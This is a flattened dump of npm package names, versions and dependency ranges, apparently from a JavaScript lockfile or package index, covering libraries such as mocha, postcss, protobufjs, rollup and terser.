p-is-promise@^2.0.0 micromatch 4.0.8 braces@^3.0.3 picomatch@^2.3.1 mime 2.6.0 mime-db 
1.33.0 1.37.0 1.52.0 mime-types 2.1.18 mime-db@~1.33.0 2.1.21 mime-db@~1.37.0 2.1.35 mime-db@1.52.0 mimic-fn 1.2.0 2.1.0 minimatch 0.3.0 lru-cache@2 sigmund@~1.0.0 3.0.4 brace-expansion@^1.1.7 3.1.2 brace-expansion@^1.1.7 4.2.1 brace-expansion@^1.1.7 5.1.6 brace-expansion@^2.0.1 10.1.1 @isaacs/brace-expansion@^5.0.0 minimist 0.0.8 1.2.0 1.2.5 1.2.8 minipass 7.1.2 mkdirp 0.3.0 0.5.1 minimist@0.0.8 0.5.4 minimist@^1.2.5 0.5.5 minimist@^1.2.5 1.0.4 mocha 2.5.3 commander@2.3.0 debug@2.2.0 diff@1.4.0 escape-string-regexp@1.0.2 glob@3.2.11 growl@1.9.2 jade@0.26.3 mkdirp@0.5.1 supports-color@1.2.0 to-iso-string@0.0.2 5.2.0 browser-stdout@1.3.1 commander@2.15.1 debug@3.1.0 diff@3.5.0 escape-string-regexp@1.0.5 glob@7.1.2 growl@1.10.5 he@1.1.1 minimatch@3.0.4 mkdirp@0.5.1 supports-color@5.4.0 6.2.3 ansi-colors@3.2.3 browser-stdout@1.3.1 debug@3.2.6 diff@3.5.0 escape-string-regexp@1.0.5 find-up@3.0.0 glob@7.1.3 growl@1.10.5 he@1.2.0 js-yaml@3.13.1 log-symbols@2.2.0 minimatch@3.0.4 mkdirp@0.5.4 ms@2.1.1 node-environment-flags@1.0.5 object.assign@4.1.0 strip-json-comments@2.0.1 supports-color@6.0.0 which@1.3.1 wide-align@1.1.3 yargs@13.3.2 yargs-parser@13.1.2 yargs-unparser@1.6.0 7.2.0 ansi-colors@3.2.3 browser-stdout@1.3.1 chokidar@3.3.0 debug@3.2.6 diff@3.5.0 escape-string-regexp@1.0.5 find-up@3.0.0 glob@7.1.3 growl@1.10.5 he@1.2.0 js-yaml@3.13.1 log-symbols@3.0.0 minimatch@3.0.4 mkdirp@0.5.5 ms@2.1.1 node-environment-flags@1.0.6 object.assign@4.1.0 strip-json-comments@2.0.1 supports-color@6.0.0 which@1.3.1 wide-align@1.1.3 yargs@13.3.2 yargs-parser@13.1.2 yargs-unparser@1.6.0 8.4.0 @ungap/promise-all-settled@1.1.2 ansi-colors@4.1.1 browser-stdout@1.3.1 chokidar@3.5.1 debug@4.3.1 diff@5.0.0 escape-string-regexp@4.0.0 find-up@5.0.0 glob@7.1.6 growl@1.10.5 he@1.2.0 js-yaml@4.0.0 log-symbols@4.0.0 minimatch@3.0.4 ms@2.1.3 nanoid@3.1.20 serialize-javascript@5.0.1 strip-json-comments@3.1.1 supports-color@8.1.1 which@2.0.2 wide-align@1.1.3 workerpool@6.1.0 yargs@16.2.0 
yargs-parser@20.2.4 yargs-unparser@2.0.0 9.2.2 @ungap/promise-all-settled@1.1.2 ansi-colors@4.1.1 browser-stdout@1.3.1 chokidar@3.5.3 debug@4.3.3 diff@5.0.0 escape-string-regexp@4.0.0 find-up@5.0.0 glob@7.2.0 growl@1.10.5 he@1.2.0 js-yaml@4.1.0 log-symbols@4.1.0 minimatch@4.2.1 ms@2.1.3 nanoid@3.3.1 serialize-javascript@6.0.0 strip-json-comments@3.1.1 supports-color@8.1.1 which@2.0.2 workerpool@6.2.0 yargs@16.2.0 yargs-parser@20.2.4 yargs-unparser@2.0.0 10.8.2 ansi-colors@^4.1.3 browser-stdout@^1.3.1 chokidar@^3.5.3 debug@^4.3.5 diff@^5.2.0 escape-string-regexp@^4.0.0 find-up@^5.0.0 glob@^8.1.0 he@^1.2.0 js-yaml@^4.1.0 log-symbols@^4.1.0 minimatch@^5.1.6 ms@^2.1.3 serialize-javascript@^6.0.2 strip-json-comments@^3.1.1 supports-color@^8.1.1 workerpool@^6.5.1 yargs@^16.2.0 yargs-parser@^20.2.9 yargs-unparser@^2.0.0 mocha-headless-server 0.1.2 Scope peer|mocha@5.x puppeteer@^1.6.0 serve-handler@^3.3.0 0.1.4 Scope peer|dhost@0.1.x Scope peer|mocha@5.x Scope peer|puppeteer@2.x mri 1.2.0 ms 0.7.1 2.0.0 2.1.1 2.1.2 2.1.3 nanoid 3.1.20 3.3.1 nice-try 1.0.5 no-case 2.3.2 lower-case@^1.1.1 node-addon-api 7.1.1 node-environment-flags 1.0.5 object.getownpropertydescriptors@^2.0.3 semver@^5.7.0 1.0.6 object.getownpropertydescriptors@^2.0.3 semver@^5.7.0 node-fetch 2.6.1 2.6.6 whatwg-url@^5.0.0 2.6.7 Scope peer|encoding@^0.1.0 whatwg-url@^5.0.0 2.7.0 Scope peer|encoding@^0.1.0 whatwg-url@^5.0.0 node-forge 0.10.0 1.3.1 node-releases 1.0.0-alpha.14 semver@^5.3.0 1.1.32 semver@^5.3.0 2.0.27 nodent-compiler 3.2.11 acorn@>= 2.5.2 <= 5.7.3 acorn-es7-plugin@^1.1.7 nodent-transform@^3.2.9 source-map@^0.5.7 3.2.13 acorn@>= 2.5.2 <= 5.7.5 acorn-es7-plugin@^1.1.7 nodent-transform@^3.2.9 source-map@^0.5.7 nodent-runtime 3.2.1 nodent-transform 3.2.9 normalize-path 3.0.0 normalize-range 0.1.2 npm-run-path 2.0.2 path-key@^2.0.0 num2fraction 1.2.2 number-is-nan 1.0.1 nwsapi 2.0.9 2.1.4 2.2.22 oauth-sign 0.9.0 object-hash 2.2.0 3.0.0 object-inspect 1.13.4 object-keys 1.1.1 object.assign 4.1.0 
define-properties@^1.1.2 function-bind@^1.1.1 has-symbols@^1.0.0 object-keys@^1.0.11 4.1.7 call-bind@^1.0.8 call-bound@^1.0.3 define-properties@^1.2.1 es-object-atoms@^1.0.0 has-symbols@^1.1.0 object-keys@^1.1.1 object.getownpropertydescriptors 2.1.8 array.prototype.reduce@^1.0.6 call-bind@^1.0.7 define-properties@^1.2.1 es-abstract@^1.23.2 es-object-atoms@^1.0.0 gopd@^1.0.1 safe-array-concat@^1.1.2 once 1.4.0 wrappy@1 optionator 0.8.2 deep-is@~0.1.3 fast-levenshtein@~2.0.4 levn@~0.3.0 prelude-ls@~1.1.2 type-check@~0.3.2 wordwrap@~1.0.0 0.8.3 deep-is@~0.1.3 fast-levenshtein@~2.0.6 levn@~0.3.0 prelude-ls@~1.1.2 type-check@~0.3.2 word-wrap@~1.2.3 os-locale 3.0.1 execa@^0.10.0 lcid@^2.0.0 mem@^4.0.0 3.1.0 execa@^1.0.0 lcid@^2.0.0 mem@^4.0.0 os-tmpdir 1.0.2 own-keys 1.0.1 get-intrinsic@^1.2.6 object-keys@^1.1.1 safe-push-apply@^1.0.0 p-defer 1.0.0 p-finally 1.0.0 p-is-promise 1.1.0 2.1.0 p-limit 2.0.0 p-try@^2.0.0 2.3.0 p-try@^2.0.0 3.1.0 yocto-queue@^0.1.0 p-locate 3.0.0 p-limit@^2.0.0 5.0.0 p-limit@^3.0.2 p-try 2.0.0 2.2.0 package-json-from-dist 1.0.1 param-case 2.1.1 no-case@^2.2.0 parse-ms 2.0.0 2.1.0 parse-node-version 1.0.1 parse5 5.1.0 5.1.1 path-exists 3.0.0 4.0.0 path-is-absolute 1.0.1 path-is-inside 1.0.2 path-key 2.0.1 3.1.1 path-parse 1.0.6 1.0.7 path-scurry 2.0.0 lru-cache@^11.0.0 minipass@^7.1.2 path-to-regexp 2.2.1 pathval 1.1.0 1.1.1 pend 1.2.0 performance-now 2.1.0 picocolors 0.2.1 1.1.1 picomatch 2.3.0 2.3.1 pn 1.1.0 polka 0.5.2 @polka/url@^0.5.0 trouter@^2.0.1 possible-typed-array-names 1.1.0 postcss 7.0.5 chalk@^2.4.1 source-map@^0.6.1 supports-color@^5.5.0 7.0.6 chalk@^2.4.1 source-map@^0.6.1 supports-color@^5.5.0 7.0.7 chalk@^2.4.1 source-map@^0.6.1 supports-color@^5.5.0 7.0.8 chalk@^2.4.2 source-map@^0.6.1 supports-color@^6.0.0 7.0.9 chalk@^2.4.2 source-map@^0.6.1 supports-color@^6.1.0 7.0.10 chalk@^2.4.2 source-map@^0.6.1 supports-color@^6.1.0 7.0.11 chalk@^2.4.2 source-map@^0.6.1 supports-color@^6.1.0 7.0.12 chalk@^2.4.2 source-map@^0.6.1 
supports-color@^6.1.0 7.0.13 chalk@^2.4.2 source-map@^0.6.1 supports-color@^6.1.0 7.0.14 chalk@^2.4.2 source-map@^0.6.1 supports-color@^6.1.0 7.0.15 chalk@^2.4.2 source-map@^0.6.1 supports-color@^6.1.0 7.0.16 chalk@^2.4.2 source-map@^0.6.1 supports-color@^6.1.0 7.0.17 chalk@^2.4.2 source-map@^0.6.1 supports-color@^6.1.0 7.0.18 chalk@^2.4.2 source-map@^0.6.1 supports-color@^6.1.0 7.0.19 chalk@^2.4.2 source-map@^0.6.1 supports-color@^6.1.0 7.0.20 chalk@^2.4.2 source-map@^0.6.1 supports-color@^6.1.0 7.0.21 chalk@^2.4.2 source-map@^0.6.1 supports-color@^6.1.0 7.0.22 chalk@^2.4.2 source-map@^0.6.1 supports-color@^6.1.0 7.0.23 chalk@^2.4.2 source-map@^0.6.1 supports-color@^6.1.0 7.0.24 chalk@^2.4.2 source-map@^0.6.1 supports-color@^6.1.0 7.0.25 chalk@^2.4.2 source-map@^0.6.1 supports-color@^6.1.0 7.0.26 chalk@^2.4.2 source-map@^0.6.1 supports-color@^6.1.0 7.0.27 chalk@^2.4.2 source-map@^0.6.1 supports-color@^6.1.0 7.0.28 chalk@^2.4.2 source-map@^0.6.1 supports-color@^6.1.0 7.0.29 chalk@^2.4.2 source-map@^0.6.1 supports-color@^6.1.0 7.0.30 chalk@^2.4.2 source-map@^0.6.1 supports-color@^6.1.0 7.0.31 chalk@^2.4.2 source-map@^0.6.1 supports-color@^6.1.0 7.0.32 chalk@^2.4.2 source-map@^0.6.1 supports-color@^6.1.0 7.0.33 chalk@^2.4.2 source-map@^0.6.1 supports-color@^6.1.0 7.0.34 chalk@^2.4.2 source-map@^0.6.1 supports-color@^6.1.0 7.0.35 chalk@^2.4.2 source-map@^0.6.1 supports-color@^6.1.0 7.0.36 chalk@^2.4.2 source-map@^0.6.1 supports-color@^6.1.0 7.0.37 nanocolors@^0.2.2 source-map@^0.6.1 7.0.38 nanocolors@^0.2.2 source-map@^0.6.1 7.0.39 picocolors@^0.2.1 source-map@^0.6.1 postcss-value-parser 3.3.1 4.2.0 prelude-ls 1.1.2 pretty-ms 4.0.0 parse-ms@^2.0.0 private 0.1.8 process-nextick-args 2.0.0 2.0.1 progress 2.0.3 promise-polyfill 8.1.3 promises-aplus-tests 2.1.2 mocha@^2.5.3 sinon@^1.10.3 underscore@~1.8.3 proto3-json-serializer 0.1.5 0.1.9 protobufjs@^6.11.2 1.1.1 protobufjs@^7.0.0 2.0.2 protobufjs@^7.2.5 protobufjs 6.11.2 @protobufjs/aspromise@^1.1.2 
@protobufjs/base64@^1.1.2 @protobufjs/codegen@^2.0.4 @protobufjs/eventemitter@^1.1.0 @protobufjs/fetch@^1.1.0 @protobufjs/float@^1.0.2 @protobufjs/inquire@^1.1.0 @protobufjs/path@^1.1.2 @protobufjs/pool@^1.1.0 @protobufjs/utf8@^1.1.0 @types/long@^4.0.1 @types/node@>=13.7.0 long@^4.0.0 6.11.3 @protobufjs/aspromise@^1.1.2 @protobufjs/base64@^1.1.2 @protobufjs/codegen@^2.0.4 @protobufjs/eventemitter@^1.1.0 @protobufjs/fetch@^1.1.0 @protobufjs/float@^1.0.2 @protobufjs/inquire@^1.1.0 @protobufjs/path@^1.1.2 @protobufjs/pool@^1.1.0 @protobufjs/utf8@^1.1.0 @types/long@^4.0.1 @types/node@>=13.7.0 long@^4.0.0 6.11.4 @protobufjs/aspromise@^1.1.2 @protobufjs/base64@^1.1.2 @protobufjs/codegen@^2.0.4 @protobufjs/eventemitter@^1.1.0 @protobufjs/fetch@^1.1.0 @protobufjs/float@^1.0.2 @protobufjs/inquire@^1.1.0 @protobufjs/path@^1.1.2 @protobufjs/pool@^1.1.0 @protobufjs/utf8@^1.1.0 @types/long@^4.0.1 @types/node@>=13.7.0 long@^4.0.0 7.2.4 @protobufjs/aspromise@^1.1.2 @protobufjs/base64@^1.1.2 @protobufjs/codegen@^2.0.4 @protobufjs/eventemitter@^1.1.0 @protobufjs/fetch@^1.1.0 @protobufjs/float@^1.0.2 @protobufjs/inquire@^1.1.0 @protobufjs/path@^1.1.2 @protobufjs/pool@^1.1.0 @protobufjs/utf8@^1.1.0 @types/node@>=13.7.0 long@^5.0.0 7.5.4 @protobufjs/aspromise@^1.1.2 @protobufjs/base64@^1.1.2 @protobufjs/codegen@^2.0.4 @protobufjs/eventemitter@^1.1.0 @protobufjs/fetch@^1.1.0 @protobufjs/float@^1.0.2 @protobufjs/inquire@^1.1.0 @protobufjs/path@^1.1.2 @protobufjs/pool@^1.1.0 @protobufjs/utf8@^1.1.0 @types/node@>=13.7.0 long@^5.0.0 protobufjs-cli 1.1.1 chalk@^4.0.0 escodegen@^1.13.0 espree@^9.0.0 estraverse@^5.1.0 glob@^8.0.0 jsdoc@^4.0.0 minimist@^1.2.0 Scope peer|protobufjs@^7.0.0 semver@^7.1.2 tmp@^0.2.1 uglify-js@^3.7.7 proxy-from-env 1.1.0 pseudomap 1.0.2 psl 1.1.29 1.4.0 1.15.0 punycode@^2.3.1 pump 3.0.0 end-of-stream@^1.1.0 once@^1.3.1 3.0.3 end-of-stream@^1.1.0 once@^1.3.1 punycode 1.4.1 2.1.1 2.3.1 punycode.js 2.3.1 puppeteer 1.20.0 debug@^4.1.0 extract-zip@^1.6.6 
https-proxy-agent@^2.2.1 mime@^2.0.3 progress@^2.0.1 proxy-from-env@^1.0.0 rimraf@^2.6.1 ws@^6.1.0 qs 6.5.2 6.5.3 randombytes 2.1.0 safe-buffer@^5.1.0 readable-stream 2.3.6 core-util-is@~1.0.0 inherits@~2.0.3 isarray@~1.0.0 process-nextick-args@~2.0.0 safe-buffer@~5.1.1 string_decoder@~1.1.1 util-deprecate@~1.0.1 2.3.7 core-util-is@~1.0.0 inherits@~2.0.3 isarray@~1.0.0 process-nextick-args@~2.0.0 safe-buffer@~5.1.1 string_decoder@~1.1.1 util-deprecate@~1.0.1 2.3.8 core-util-is@~1.0.0 inherits@~2.0.3 isarray@~1.0.0 process-nextick-args@~2.0.0 safe-buffer@~5.1.1 string_decoder@~1.1.1 util-deprecate@~1.0.1 3.6.0 inherits@^2.0.3 string_decoder@^1.1.1 util-deprecate@^1.0.1 3.6.2 inherits@^2.0.3 string_decoder@^1.1.1 util-deprecate@^1.0.1 readdirp 3.1.1 picomatch@^2.0.4 3.2.0 picomatch@^2.0.4 3.5.0 picomatch@^2.2.1 3.6.0 picomatch@^2.2.1 4.1.2 reflect.getprototypeof 1.0.10 call-bind@^1.0.8 define-properties@^1.2.1 es-abstract@^1.23.9 es-errors@^1.3.0 es-object-atoms@^1.0.0 get-intrinsic@^1.2.7 get-proto@^1.0.1 which-builtin-type@^1.2.1 regenerate 1.4.0 1.4.2 regenerate-unicode-properties 8.1.0 regenerate@^1.4.0 10.2.2 regenerate@^1.4.2 regenerator-runtime 0.13.3 0.13.11 regenerator-transform 0.14.1 private@^0.1.6 regexp-tree 0.1.13 regexp.prototype.flags 1.5.4 call-bind@^1.0.8 define-properties@^1.2.1 es-errors@^1.3.0 get-proto@^1.0.1 gopd@^1.2.0 set-function-name@^2.0.2 regexpu-core 4.6.0 regenerate@^1.4.0 regenerate-unicode-properties@^8.1.0 regjsgen@^0.5.0 regjsparser@^0.6.0 unicode-match-property-ecmascript@^1.0.4 unicode-match-property-value-ecmascript@^1.1.0 6.4.0 regenerate@^1.4.2 regenerate-unicode-properties@^10.2.2 regjsgen@^0.8.0 regjsparser@^0.13.0 unicode-match-property-ecmascript@^2.0.0 unicode-match-property-value-ecmascript@^2.2.1 regjsgen 0.5.0 0.8.0 regjsparser 0.6.0 jsesc@~0.5.0 0.13.0 jsesc@~3.1.0 relateurl 0.2.7 remove-trailing-separator 1.1.0 replace-ext 1.0.0 1.0.1 request 2.88.0 aws-sign2@~0.7.0 aws4@^1.8.0 caseless@~0.12.0 combined-stream@~1.0.6 
extend@~3.0.2 forever-agent@~0.6.1 form-data@~2.3.2 har-validator@~5.1.0 http-signature@~1.2.0 is-typedarray@~1.0.0 isstream@~0.1.2 json-stringify-safe@~5.0.1 mime-types@~2.1.19 oauth-sign@~0.9.0 performance-now@^2.1.0 qs@~6.5.2 safe-buffer@^5.1.2 tough-cookie@~2.4.3 tunnel-agent@^0.6.0 uuid@^3.3.2 2.88.2 aws-sign2@~0.7.0 aws4@^1.8.0 caseless@~0.12.0 combined-stream@~1.0.6 extend@~3.0.2 forever-agent@~0.6.1 form-data@~2.3.2 har-validator@~5.1.3 http-signature@~1.2.0 is-typedarray@~1.0.0 isstream@~0.1.2 json-stringify-safe@~5.0.1 mime-types@~2.1.19 oauth-sign@~0.9.0 performance-now@^2.1.0 qs@~6.5.2 safe-buffer@^5.1.2 tough-cookie@~2.5.0 tunnel-agent@^0.6.0 uuid@^3.3.2 request-promise-core 1.1.1 lodash@^4.13.1 Scope peer|request@^2.34 1.1.2 lodash@^4.17.11 Scope peer|request@^2.34 1.1.4 lodash@^4.17.19 Scope peer|request@^2.34 request-promise-native 1.0.5 Scope peer|request@^2.34 request-promise-core@1.1.1 stealthy-require@^1.1.0 tough-cookie@>=2.3.3 1.0.7 Scope peer|request@^2.34 request-promise-core@1.1.2 stealthy-require@^1.1.1 tough-cookie@^2.3.3 1.0.9 Scope peer|request@^2.34 request-promise-core@1.1.4 stealthy-require@^1.1.1 tough-cookie@^2.3.3 require-directory 2.1.1 require-main-filename 1.0.1 2.0.0 requizzle 0.2.4 lodash@^4.17.21 resolve 1.20.0 is-core-module@^2.2.0 path-parse@^1.0.6 1.22.11 is-core-module@^2.16.1 path-parse@^1.0.7 supports-preserve-symlinks-flag@^1.0.0 retry-request 4.2.2 debug@^4.1.1 extend@^3.0.2 5.0.2 debug@^4.1.1 extend@^3.0.2 7.0.2 @types/request@^2.48.8 extend@^3.0.2 teeny-request@^9.0.0 rimraf 2.7.1 glob@^7.1.3 3.0.2 glob@^7.1.3 rollup 1.19.4 @types/estree@0.0.39 @types/node@^12.6.9 acorn@^6.2.1 1.20.0 @types/estree@0.0.39 @types/node@^12.7.2 acorn@^7.0.0 1.20.1 @types/estree@0.0.39 @types/node@^12.7.2 acorn@^7.0.0 1.20.2 @types/estree@0.0.39 @types/node@^12.7.2 acorn@^7.0.0 1.20.3 @types/estree@0.0.39 @types/node@^12.7.2 acorn@^7.0.0 1.21.0 @types/estree@0.0.39 @types/node@^12.7.4 acorn@^7.0.0 1.21.1 @types/estree@0.0.39 
@types/node@^12.7.4 acorn@^7.0.0 1.21.2 @types/estree@0.0.39 @types/node@^12.7.4 acorn@^7.0.0 1.21.3 @types/estree@0.0.39 @types/node@^12.7.5 acorn@^7.0.0 1.21.4 @types/estree@0.0.39 @types/node@^12.7.5 acorn@^7.0.0 1.22.0 @types/estree@* @types/node@* acorn@^7.1.0 1.23.0 @types/estree@* @types/node@^12.7.10 acorn@^7.1.0 1.23.1 @types/estree@* @types/node@* acorn@^7.1.0 1.24.0 @types/estree@* @types/node@* acorn@^7.1.0 1.25.0 @types/estree@* @types/node@* acorn@^7.1.0 1.25.1 @types/estree@* @types/node@* acorn@^7.1.0 1.25.2 @types/estree@* @types/node@* acorn@^7.1.0 1.26.0 @types/estree@* @types/node@* acorn@^7.1.0 1.26.1 @types/estree@* @types/node@* acorn@^7.1.0 1.26.2 @types/estree@* @types/node@* acorn@^7.1.0 1.26.3 @types/estree@* @types/node@* acorn@^7.1.0 1.26.4 @types/estree@* @types/node@* acorn@^7.1.0 1.26.5 @types/estree@* @types/node@* acorn@^7.1.0 1.27.0 @types/estree@* @types/node@* acorn@^7.1.0 1.27.1 @types/estree@* @types/node@* acorn@^7.1.0 1.27.2 @types/estree@* @types/node@* acorn@^7.1.0 1.27.3 @types/estree@* @types/node@* acorn@^7.1.0 1.27.4 @types/estree@* @types/node@* acorn@^7.1.0 1.27.5 @types/estree@* @types/node@* acorn@^7.1.0 1.27.6 @types/estree@* @types/node@* acorn@^7.1.0 1.27.7 @types/estree@* @types/node@* acorn@^7.1.0 1.27.8 @types/estree@* @types/node@* acorn@^7.1.0 1.27.9 @types/estree@* @types/node@* acorn@^7.1.0 1.27.10 @types/estree@* @types/node@* acorn@^7.1.0 1.27.11 @types/estree@* @types/node@* acorn@^7.1.0 1.27.12 @types/estree@* @types/node@* acorn@^7.1.0 1.27.13 @types/estree@* @types/node@* acorn@^7.1.0 1.27.14 @types/estree@* @types/node@* acorn@^7.1.0 1.28.0 @types/estree@* @types/node@* acorn@^7.1.0 1.29.0 @types/estree@* @types/node@* acorn@^7.1.0 1.29.1 @types/estree@* @types/node@* acorn@^7.1.0 1.30.0 @types/estree@* @types/node@* acorn@^7.1.0 1.30.1 @types/estree@* @types/node@* acorn@^7.1.0 1.31.0 @types/estree@* @types/node@* acorn@^7.1.0 1.31.1 @types/estree@* @types/node@* acorn@^7.1.0 1.32.0 
@types/estree@* @types/node@* acorn@^7.1.0 1.32.1 @types/estree@* @types/node@* acorn@^7.1.0 2.59.0 fsevents@~2.3.2 Opt|fsevents@~2.3.2 2.79.2 Opt|fsevents@~2.3.2 safe-array-concat 1.1.3 call-bind@^1.0.8 call-bound@^1.0.2 get-intrinsic@^1.2.6 has-symbols@^1.1.0 isarray@^2.0.5 safe-buffer 5.1.2 5.2.1 safe-push-apply 1.0.0 es-errors@^1.3.0 isarray@^2.0.5 safe-regex-test 1.1.0 call-bound@^1.0.2 es-errors@^1.3.0 is-regex@^1.2.1 safer-buffer 2.1.2 samsam 1.1.2 sass 1.22.9 chokidar@>=2.0.0 <4.0.0 1.93.3 Opt|@parcel/watcher@^2.4.1 chokidar@^4.0.0 immutable@^5.0.2 source-map-js@>=0.6.2 <2.0.0 saxes 3.1.3 xmlchars@^1.3.1 3.1.11 xmlchars@^2.1.1 semver 5.5.1 5.6.0 5.7.2 6.3.0 6.3.1 7.7.3 serialize-javascript 5.0.1 randombytes@^2.1.0 6.0.0 randombytes@^2.1.0 6.0.2 randombytes@^2.1.0 serve-handler 3.6.2 bytes@3.0.0 content-disposition@0.5.2 fast-url-parser@1.1.3 glob-slasher@1.0.1 mime-types@2.1.18 minimatch@3.0.4 path-is-inside@1.0.2 path-to-regexp@2.2.1 set-blocking 2.0.0 set-function-length 1.2.2 define-data-property@^1.1.4 es-errors@^1.3.0 function-bind@^1.1.2 get-intrinsic@^1.2.4 gopd@^1.0.1 has-property-descriptors@^1.0.2 set-function-name 2.0.2 define-data-property@^1.1.4 es-errors@^1.3.0 functions-have-names@^1.2.3 has-property-descriptors@^1.0.2 set-proto 1.0.0 dunder-proto@^1.0.1 es-errors@^1.3.0 es-object-atoms@^1.0.0 shebang-command 1.2.0 shebang-regex@^1.0.0 2.0.0 shebang-regex@^3.0.0 shebang-regex 1.0.0 3.0.0 side-channel 1.1.0 es-errors@^1.3.0 object-inspect@^1.13.3 side-channel-list@^1.0.0 side-channel-map@^1.0.1 side-channel-weakmap@^1.0.2 side-channel-list 1.0.0 es-errors@^1.3.0 object-inspect@^1.13.3 side-channel-map 1.0.1 call-bound@^1.0.2 es-errors@^1.3.0 get-intrinsic@^1.2.5 object-inspect@^1.13.3 side-channel-weakmap 1.0.2 call-bound@^1.0.2 es-errors@^1.3.0 get-intrinsic@^1.2.5 object-inspect@^1.13.3 side-channel-map@^1.0.1 sigmund 1.0.1 signal-exit 3.0.2 3.0.7 4.1.0 sinon 1.17.7 formatio@1.1.1 lolex@1.3.2 samsam@1.1.2 util@>=0.10.3 <1 source-map 0.5.7 
0.6.1 source-map-js 1.2.1 source-map-support 0.5.9 buffer-from@^1.0.0 source-map@^0.6.0 0.5.21 buffer-from@^1.0.0 source-map@^0.6.0 sourcemap-codec 1.4.8 sprintf-js 1.0.3 sshpk 1.15.1 asn1@~0.2.3 assert-plus@^1.0.0 bcrypt-pbkdf@^1.0.0 dashdash@^1.12.0 ecc-jsbn@~0.1.1 getpass@^0.1.1 jsbn@~0.1.0 safer-buffer@^2.0.2 tweetnacl@~0.14.0 1.18.0 asn1@~0.2.3 assert-plus@^1.0.0 bcrypt-pbkdf@^1.0.0 dashdash@^1.12.0 ecc-jsbn@~0.1.1 getpass@^0.1.1 jsbn@~0.1.0 safer-buffer@^2.0.2 tweetnacl@~0.14.0 stealthy-require 1.1.1 stop-iteration-iterator 1.1.0 es-errors@^1.3.0 internal-slot@^1.1.0 stream-events 1.0.5 stubs@^3.0.0 stream-shift 1.0.1 1.0.3 string-width 1.0.2 code-point-at@^1.0.0 is-fullwidth-code-point@^1.0.0 strip-ansi@^3.0.0 2.1.1 is-fullwidth-code-point@^2.0.0 strip-ansi@^4.0.0 3.1.0 emoji-regex@^7.0.1 is-fullwidth-code-point@^2.0.0 strip-ansi@^5.1.0 4.2.3 emoji-regex@^8.0.0 is-fullwidth-code-point@^3.0.0 strip-ansi@^6.0.1 5.1.2 eastasianwidth@^0.2.0 emoji-regex@^9.2.2 strip-ansi@^7.0.1 string.prototype.trim 1.2.10 call-bind@^1.0.8 call-bound@^1.0.2 define-data-property@^1.1.4 define-properties@^1.2.1 es-abstract@^1.23.5 es-object-atoms@^1.0.0 has-property-descriptors@^1.0.2 string.prototype.trimend 1.0.9 call-bind@^1.0.8 call-bound@^1.0.2 define-properties@^1.2.1 es-object-atoms@^1.0.0 string.prototype.trimstart 1.0.8 call-bind@^1.0.7 define-properties@^1.2.1 es-object-atoms@^1.0.0 string_decoder 1.1.1 safe-buffer@~5.1.0 1.3.0 safe-buffer@~5.2.0 strip-ansi 3.0.1 ansi-regex@^2.0.0 4.0.0 ansi-regex@^3.0.0 5.2.0 ansi-regex@^4.1.0 6.0.1 ansi-regex@^5.0.1 7.1.2 ansi-regex@^6.0.1 strip-eof 1.0.0 strip-json-comments 2.0.1 3.1.1 stubs 3.0.0 supports-color 1.2.0 5.4.0 has-flag@^3.0.0 5.5.0 has-flag@^3.0.0 6.0.0 has-flag@^3.0.0 7.2.0 has-flag@^4.0.0 8.1.1 has-flag@^4.0.0 supports-preserve-symlinks-flag 1.0.0 symbol-tree 3.2.2 3.2.4 teeny-request 7.1.3 http-proxy-agent@^5.0.0 https-proxy-agent@^5.0.0 node-fetch@^2.6.1 stream-events@^1.0.5 uuid@^8.0.0 7.2.0 http-proxy-agent@^5.0.0 
https-proxy-agent@^5.0.0 node-fetch@^2.6.1 stream-events@^1.0.5 uuid@^8.0.0 9.0.0 http-proxy-agent@^5.0.0 https-proxy-agent@^5.0.0 node-fetch@^2.6.9 stream-events@^1.0.5 uuid@^9.0.0 terser 3.10.11 commander@~2.17.1 source-map@~0.6.1 source-map-support@~0.5.6 3.10.12 commander@~2.17.1 source-map@~0.6.1 source-map-support@~0.5.6 3.10.13 commander@~2.17.1 source-map@~0.6.1 source-map-support@~0.5.6 3.11.0 commander@~2.17.1 source-map@~0.6.1 source-map-support@~0.5.6 3.12.0 commander@~2.17.1 source-map@~0.6.1 source-map-support@~0.5.6 3.13.0 commander@~2.17.1 source-map@~0.6.1 source-map-support@~0.5.6 3.13.1 commander@~2.17.1 source-map@~0.6.1 source-map-support@~0.5.6 3.14.0 commander@~2.17.1 source-map@~0.6.1 source-map-support@~0.5.6 3.14.1 commander@~2.17.1 source-map@~0.6.1 source-map-support@~0.5.6 3.16.0 commander@~2.17.1 source-map@~0.6.1 source-map-support@~0.5.9 3.16.1 commander@~2.17.1 source-map@~0.6.1 source-map-support@~0.5.9 3.17.0 commander@^2.19.0 source-map@~0.6.1 source-map-support@~0.5.10 4.8.1 commander@^2.20.0 source-map@~0.6.1 source-map-support@~0.5.12 time-stamp 1.1.0 tmp 0.0.33 os-tmpdir@~1.0.2 0.2.5 to-fast-properties 2.0.0 to-iso-string 0.0.2 to-regex-range 5.0.1 is-number@^7.0.0 tough-cookie 2.3.3 punycode@^1.4.1 2.3.4 punycode@^1.4.1 2.4.2 psl@^1.1.24 punycode@^1.4.1 2.4.3 psl@^1.1.24 punycode@^1.4.1 2.5.0 psl@^1.1.28 punycode@^2.1.1 3.0.1 ip-regex@^2.1.0 psl@^1.1.28 punycode@^2.1.1 toxic 1.0.1 lodash@^4.17.10 tr46 0.0.3 1.0.1 punycode@^2.1.0 trim-right 1.0.1 trouter 2.0.1 matchit@^1.0.0 tslib 2.3.1 2.8.1 tunnel-agent 0.6.0 safe-buffer@^5.0.1 tweetnacl 0.14.5 type-check 0.3.2 prelude-ls@~1.1.2 type-detect 4.0.8 4.1.0 typed-array-buffer 1.0.3 call-bound@^1.0.3 es-errors@^1.3.0 is-typed-array@^1.1.14 typed-array-byte-length 1.0.3 call-bind@^1.0.8 for-each@^0.3.3 gopd@^1.2.0 has-proto@^1.2.0 is-typed-array@^1.1.14 typed-array-byte-offset 1.0.4 available-typed-arrays@^1.0.7 call-bind@^1.0.8 for-each@^0.3.3 gopd@^1.2.0 has-proto@^1.2.0 
